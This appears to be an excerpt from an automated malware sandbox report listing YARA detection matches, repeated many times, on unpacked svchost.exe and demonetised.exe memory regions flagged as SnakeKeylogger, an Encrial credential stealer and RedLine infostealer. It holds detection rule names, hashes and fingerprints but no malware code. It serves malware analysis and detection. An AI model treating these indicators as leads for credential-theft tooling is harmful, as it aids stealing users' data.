                  Source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.3.svchost.exe.305e000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.3.svchost.exe.305e000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.3.svchost.exe.305e000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.demonetised.exe.3a90000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 6.2.svchost.exe.7740000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.svchost.exe.7740000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.svchost.exe.7740000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.2.svchost.exe.7970000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.svchost.exe.7970000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.svchost.exe.7970000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.3.svchost.exe.305d000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.3.svchost.exe.305d000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.3.svchost.exe.305d000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 2.2.demonetised.exe.1290000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.2.svchost.exe.7970f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.svchost.exe.7970f20.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.svchost.exe.7970f20.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 3.2.svchost.exe.7c40000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.svchost.exe.7c40000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.svchost.exe.7c40000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.svchost.exe.7740f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.svchost.exe.7740f20.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.svchost.exe.7740f20.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.3.svchost.exe.305df20.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.3.svchost.exe.305df20.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.3.svchost.exe.305df20.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000003.00000002.4522422465.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000006.00000002.4522419092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
